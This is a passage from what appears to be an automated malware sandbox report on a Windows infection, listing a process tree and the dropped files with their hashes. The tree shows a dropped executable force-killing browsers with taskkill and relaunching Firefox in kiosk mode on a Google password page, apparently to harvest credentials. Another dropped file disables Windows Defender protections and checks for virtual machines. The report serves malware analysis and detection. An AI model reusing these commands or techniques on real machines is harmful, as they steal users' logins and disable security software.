                                                                            "C:\Users\Admin\AppData\Local\Temp\1008008001\83fb310255.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2900
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM firefox.exe /T
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2680
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM chrome.exe /T
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1788
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM msedge.exe /T
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2868
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM opera.exe /T
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1544
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /F /IM brave.exe /T
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2308
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                              5⤵
                                                                                PID:2660
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                  6⤵
                                                                                  • Checks processor information in registry
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:2704
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.0.625675257\1536443969" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a59efa0-e1ae-4cfb-8850-c17b132079fa} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 1336 fff3558 gpu
                                                                                    7⤵
                                                                                      PID:2304
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.1.2133812188\1741033240" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {621656cd-3769-4959-8c40-791ab271371d} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 1500 42ec458 socket
                                                                                      7⤵
                                                                                        PID:1664
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.2.891977646\1134885359" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ae5c1b6-e7cc-4820-a233-a249d7c5aa57} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 2112 19fae058 tab
                                                                                        7⤵
                                                                                          PID:1600
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.3.40670488\361595298" -childID 2 -isForBrowser -prefsHandle 664 -prefMapHandle 1688 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37bbc758-e230-4589-a439-a9e4ea450927} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 660 d64b58 tab
                                                                                          7⤵
                                                                                            PID:3240
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.4.1491087774\90260359" -childID 3 -isForBrowser -prefsHandle 3928 -prefMapHandle 3892 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c191578-9ef6-4eaf-8556-353ac0e05a46} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 3940 20e1f558 tab
                                                                                            7⤵
                                                                                              PID:3352
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.5.1797424787\1996508825" -childID 4 -isForBrowser -prefsHandle 4052 -prefMapHandle 4056 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37dacf9d-b338-45dd-a0cd-0b5ea80b7d0c} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 4040 20e74758 tab
                                                                                              7⤵
                                                                                                PID:3388
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2704.6.926681212\1289234777" -childID 5 -isForBrowser -prefsHandle 4216 -prefMapHandle 4220 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ab0e4d2-5e0a-47a4-a28f-8a6fc00ef3b9} 2704 "\\.\pipe\gecko-crash-server-pipe.2704" 4204 1b4e6e58 tab
                                                                                                7⤵
                                                                                                  PID:3404
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008009001\6b7ea1916e.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1008009001\6b7ea1916e.exe"
                                                                                            4⤵
                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Windows security modification
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1688
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "1312334019-302485105-1301657974-474988107946061518-117009634010672090881007261137"
                                                                                      1⤵
                                                                                        PID:4324
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "-1674326670-460639551-750922514-11084594051379901846-564589829-938370267-1966806497"
                                                                                        1⤵
                                                                                          PID:4332
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe "16646115571791511900-681827603-942356812-498296765-764455546269684301519703575"
                                                                                          1⤵
                                                                                            PID:4640
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "-1908889740-1586388029-502660058-415292678-367474709183893677018926657962108130468"
                                                                                            1⤵
                                                                                              PID:4808
                                                                                            • C:\Windows\system32\conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe "180407587267493346017183925188790855881113233249896401092857161233-1514590275"
                                                                                              1⤵
                                                                                                PID:4820
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "1551227363102718208374937542-575227634-781432479135411378-303569346687837121"
                                                                                                1⤵
                                                                                                  PID:5068
                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe "-14807601331288813269-888630267-211412903509381296-974051053-393700333-1660723887"
                                                                                                  1⤵
                                                                                                    PID:3980
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-21362521141231747893-9122782411855086293-1041546578-129603369-6972193192034575075"
                                                                                                    1⤵
                                                                                                      PID:2536
                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe "1296479759161551706-1042432097-1520546185-23485389080803882419861411341884100204"
                                                                                                      1⤵
                                                                                                        PID:2908
                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe "-1622979274-1334215096112097373316949843276676050761549728138736374503-520972656"
                                                                                                        1⤵
                                                                                                          PID:3764
                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe "1165341327-258809888180297665592150465-1682018720-1732642868705536824-1130367602"
                                                                                                          1⤵
                                                                                                            PID:3856

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                                            Filesize

                                                                                                            264KB

                                                                                                            MD5

                                                                                                            f50f89a0a91564d0b8a211f8921aa7de

                                                                                                            SHA1

                                                                                                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                            SHA256

                                                                                                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                            SHA512

                                                                                                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                                                                            Filesize

                                                                                                            16B

                                                                                                            MD5

                                                                                                            18e723571b00fb1694a3bad6c78e4054

                                                                                                            SHA1

                                                                                                            afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                                            SHA256

                                                                                                            8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                                            SHA512

                                                                                                            43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                            Filesize

                                                                                                            23KB

                                                                                                            MD5

                                                                                                            88bf2c89d3e78fc4e5bb8ffdb7ddc9ff

                                                                                                            SHA1

                                                                                                            55a6270b2ba13105dc678a6c54b28da387ac220c

                                                                                                            SHA256

                                                                                                            1aa2221ba651d0e6bab492f2a1ba92a72ac6afa2464b28d5e4f550b905f2bfdb

                                                                                                            SHA512

                                                                                                            707d7b1acf0160a6f6f82d3b0326a1bf23380cd2a8ca4849ede236a96a9953d17eacd42887d721c54fdd9da17eb6d4424c2816c64729827b02bf47bc1aa9e122

                                                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                            Filesize

                                                                                                            13KB

                                                                                                            MD5

                                                                                                            f99b4984bd93547ff4ab09d35b9ed6d5

                                                                                                            SHA1

                                                                                                            73bf4d313cb094bb6ead04460da9547106794007

                                                                                                            SHA256

                                                                                                            402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                                                                                                            SHA512

                                                                                                            cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe

                                                                                                            Filesize

                                                                                                            1.8MB

                                                                                                            MD5

                                                                                                            fa351b72ffb13bfc332a25a57a7f075f

                                                                                                            SHA1

                                                                                                            5af49613c179bed23dd43d76aedbe3d1b63004a3

                                                                                                            SHA256

                                                                                                            d2c90431f09fc7818c5afb43bbec077fc29544ddcb786bc655a82d1c33e20cdc

                                                                                                            SHA512

                                                                                                            de49eeaa695f9d6252bd3b547689b0e648999c7ee68d2e16a3d073d88505a1c6b0a4da538db7ce52653bfc2dc89a13dd07c894f8e28f9227f1d1c92df67216f9

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1007999001\6592c74c9e.exe

                                                                                                            Filesize

                                                                                                            4.2MB

                                                                                                            MD5

                                                                                                            40cb4053a584486a21a109ffb44933c9

                                                                                                            SHA1

                                                                                                            07a94039a6176646ecdb0a5b0fab59b632bdbd18

                                                                                                            SHA256

                                                                                                            71b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84

                                                                                                            SHA512

                                                                                                            58356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

                                                                                                            Filesize

                                                                                                            50KB

                                                                                                            MD5

                                                                                                            666248c216a3f63828f739839230f9f6

                                                                                                            SHA1

                                                                                                            13690837235053762a538b4c5b2b601ec9f6bb22

                                                                                                            SHA256

                                                                                                            00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

                                                                                                            SHA512

                                                                                                            37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008006001\b1c07bab38.exe

                                                                                                            Filesize

                                                                                                            1.8MB

                                                                                                            MD5

                                                                                                            6380b8ca2f9bfc1d86617a3a7fd924f1

                                                                                                            SHA1

                                                                                                            04ff7e660a59bd2c45098e99a3fd5bff614d2d57

                                                                                                            SHA256

                                                                                                            f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c

                                                                                                            SHA512

                                                                                                            8b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008007001\2c7bb0b2a1.exe

                                                                                                            Filesize

                                                                                                            1.7MB

                                                                                                            MD5

                                                                                                            81380b3f4700458353f68405ba69f471

                                                                                                            SHA1

                                                                                                            2c51c11246200de63ac0121df7fc94545f0aef38

                                                                                                            SHA256

                                                                                                            5b039e26817ac3dde3340af44180e943e7823936cb537342e8a818e5d8705908

                                                                                                            SHA512

                                                                                                            a59cd918a59a2aef818e2974579026a1ab344bfe658e23954550b6c2d44df2285d5365cd60d4086c60d4234ed8616546826d9ed66634150f0d4fde8702e0ff3f

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008008001\83fb310255.exe

                                                                                                            Filesize

                                                                                                            901KB

                                                                                                            MD5

                                                                                                            7fa8aa5776c44304def2ed20c16d29ec

                                                                                                            SHA1

                                                                                                            0fc5106137c34600f7bbb963a6c73b3f4911f1a3

                                                                                                            SHA256

                                                                                                            69a5b88b0132f61fcd531761b93e11ee2d8a53228431b295c6827f314fd47dbd

                                                                                                            SHA512

                                                                                                            6eb521c820d034683a014f4fa998055c339114182512c3241330e5b8a43843b01c478cf8cb8d1e51b767c888da9fbcb8a7ee900287b1d359b7ead2ef6eeb2aa8

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008009001\6b7ea1916e.exe

                                                                                                            Filesize

                                                                                                            2.7MB

                                                                                                            MD5

                                                                                                            dd9ad82b68a13333652866431f0ee8d9

                                                                                                            SHA1

                                                                                                            23b45a0875b428204f4f3448442aae222274612f

                                                                                                            SHA256

                                                                                                            8ba30fce56df7cd2c37d70dda3dbde19b2d5ff5c3896e791e484f2a1838fd106

                                                                                                            SHA512

                                                                                                            35311c88fd3fa87f3ecbb4442c77d349673fcf8f7d6b68ba781efd1a95ef562a26dc3623437304f1b69bc128f8dce28656cf28a1e79d2ff0528d6c93def13ee7

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CabEB7A.tmp

                                                                                                            Filesize

                                                                                                            70KB

                                                                                                            MD5

                                                                                                            49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                            SHA1

                                                                                                            1723be06719828dda65ad804298d0431f6aff976

                                                                                                            SHA256

                                                                                                            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                            SHA512

                                                                                                            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\TarEBF9.tmp

                                                                                                            Filesize

                                                                                                            181KB

                                                                                                            MD5

                                                                                                            4ea6026cf93ec6338144661bf1202cd1

                                                                                                            SHA1

                                                                                                            a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                            SHA256

                                                                                                            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                            SHA512

                                                                                                            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                            Filesize

                                                                                                            1.8MB

                                                                                                            MD5

                                                                                                            873f4ff6922f79aca237323377183153

                                                                                                            SHA1

                                                                                                            c0e782ab9058afb71626fae94fdd996cbeda934a

                                                                                                            SHA256

                                                                                                            bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271

                                                                                                            SHA512

                                                                                                            7fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            82f229d0c36b68073da70ef5958e425d

                                                                                                            SHA1

                                                                                                            2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                                                            SHA256

                                                                                                            0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                                                            SHA512

                                                                                                            4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                            Filesize

                                                                                                            442KB

                                                                                                            MD5

                                                                                                            85430baed3398695717b0263807cf97c

                                                                                                            SHA1

                                                                                                            fffbee923cea216f50fce5d54219a188a5100f41

                                                                                                            SHA256

                                                                                                            a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                                                                            SHA512

                                                                                                            06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                            Filesize

                                                                                                            8.0MB

                                                                                                            MD5

                                                                                                            a01c5ecd6108350ae23d2cddf0e77c17

                                                                                                            SHA1

                                                                                                            c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                                                                            SHA256

                                                                                                            345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                                                                            SHA512

                                                                                                            b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                                                                          • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                                                            Filesize

                                                                                                            27KB

                                                                                                            MD5

                                                                                                            238ec4d17050e1841e8e0171407c2260

                                                                                                            SHA1

                                                                                                            2c8c14b257641f1e1151c6303dabde01621314f2

                                                                                                            SHA256

                                                                                                            163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                                                            SHA512

                                                                                                            3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                            Filesize

                                                                                                            7KB

                                                                                                            MD5

                                                                                                            be858899c22637c97a320f2bb43c6330

                                                                                                            SHA1

                                                                                                            47a6fe20250a9d89297e3f4e6670987ed5b7d901

                                                                                                            SHA256

                                                                                                            64ccfe5f7a813cd030c2e949fbdbc318c6eb6293d725cd969414d3ba5f381693

                                                                                                            SHA512

                                                                                                            583b4f7ffee187a45149ab923050a13badd22f92557ed79f2b7040ba1bab5500a8523b5f8e6adf589c4a3bdded9b8d266692792d2964c6f7eab70e7cb392dbd9

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            7fb801c6d47a3c5bd49bcd7198dd19a7

                                                                                                            SHA1

                                                                                                            2ca34d28132acb85cfcc0374f90f9c50829343be

                                                                                                            SHA256

                                                                                                            9c0133af4898f5fd3287b0982d0227635069b492b5571ba5f1fb23d55866592f

                                                                                                            SHA512

                                                                                                            d30e47a4e626280d417252afa6fb1a2163acdc38ee1484a443c27f2d42a59f021eb40ae444f3812efbfa1cbdf62a6abc8b5ee698206235112aaf887d7fb3424d

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\3e1ff4bd-0177-44e5-804f-7626725733ad

                                                                                                            Filesize

                                                                                                            745B

                                                                                                            MD5

                                                                                                            62c49c36bbe08c0567df998804d7c1ba

                                                                                                            SHA1

                                                                                                            79c486eefdf8f91e75d467d9d767b8e5dac4699a

                                                                                                            SHA256

                                                                                                            fe117c9f8ed61050b30c765fb9a660e2ab22bab5c9bd1d8603cc000b0a697695

                                                                                                            SHA512

                                                                                                            ff738b83dbec796279ddd41ebf73644f4a1b26ab26cd04e6b9c456e7c8a9cf701bdba808f61708bd82ed6859312f1ea960828f1c12b401bf423ef9fe0954df83

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\6d8b6169-fbec-4b03-b28a-a1bb707935f0

                                                                                                            Filesize

                                                                                                            11KB

                                                                                                            MD5

                                                                                                            e3758f8f72b6162ad38cabbf2480f690

                                                                                                            SHA1

                                                                                                            d4a26bcbe3fd74e3068b827313e8d3096622b479

                                                                                                            SHA256

                                                                                                            1e9bf2f809018bded2716fc51c9de88172afe27e689a012e3e0076e22e4da3f4

                                                                                                            SHA512

                                                                                                            7a79c06d72fbb77fed19f5c99953bae120f847c1cba4dd7aee878c11ee1868ebbe2eae0bdba0132ab99425199bd5a49891861b81678a9168c63f05d00a59b039

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                                                                                                            Filesize

                                                                                                            997KB

                                                                                                            MD5

                                                                                                            fe3355639648c417e8307c6d051e3e37

                                                                                                            SHA1

                                                                                                            f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                                                                                            SHA256

                                                                                                            1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                                                                                            SHA512

                                                                                                            8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                                                                                                            Filesize

                                                                                                            116B

                                                                                                            MD5

                                                                                                            3d33cdc0b3d281e67dd52e14435dd04f

                                                                                                            SHA1

                                                                                                            4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                                                                                            SHA256

                                                                                                            f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                                                                                            SHA512

                                                                                                            a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                                                                                                            Filesize

                                                                                                            479B

                                                                                                            MD5

                                                                                                            49ddb419d96dceb9069018535fb2e2fc

                                                                                                            SHA1

                                                                                                            62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                                                                                            SHA256

                                                                                                            2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                                                                                            SHA512

                                                                                                            48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                                                                                                            Filesize

                                                                                                            372B

                                                                                                            MD5

                                                                                                            8be33af717bb1b67fbd61c3f4b807e9e

                                                                                                            SHA1

                                                                                                            7cf17656d174d951957ff36810e874a134dd49e0

                                                                                                            SHA256

                                                                                                            e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                                                                                                            SHA512

                                                                                                            6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                                                                                                            Filesize

                                                                                                            11.8MB

                                                                                                            MD5

                                                                                                            33bf7b0439480effb9fb212efce87b13

                                                                                                            SHA1

                                                                                                            cee50f2745edc6dc291887b6075ca64d716f495a

                                                                                                            SHA256

                                                                                                            8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                                                                                                            SHA512

                                                                                                            d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            688bed3676d2104e7f17ae1cd2c59404

                                                                                                            SHA1

                                                                                                            952b2cdf783ac72fcb98338723e9afd38d47ad8e

                                                                                                            SHA256

                                                                                                            33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                                                                                                            SHA512

                                                                                                            7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            937326fead5fd401f6cca9118bd9ade9

                                                                                                            SHA1

                                                                                                            4526a57d4ae14ed29b37632c72aef3c408189d91

                                                                                                            SHA256

                                                                                                            68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                                                                                                            SHA512

                                                                                                            b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js

                                                                                                            Filesize

                                                                                                            7KB

                                                                                                            MD5

                                                                                                            446741b1ba1217d9cbbd8e63e48d85b6

                                                                                                            SHA1

                                                                                                            7653ccf83f30e7b2730f0b48318a5c5e341f89f1

                                                                                                            SHA256

                                                                                                            80a026e4446fae3fb04261c44942f90179a20327b95587bc02a6321945ac54a4

                                                                                                            SHA512

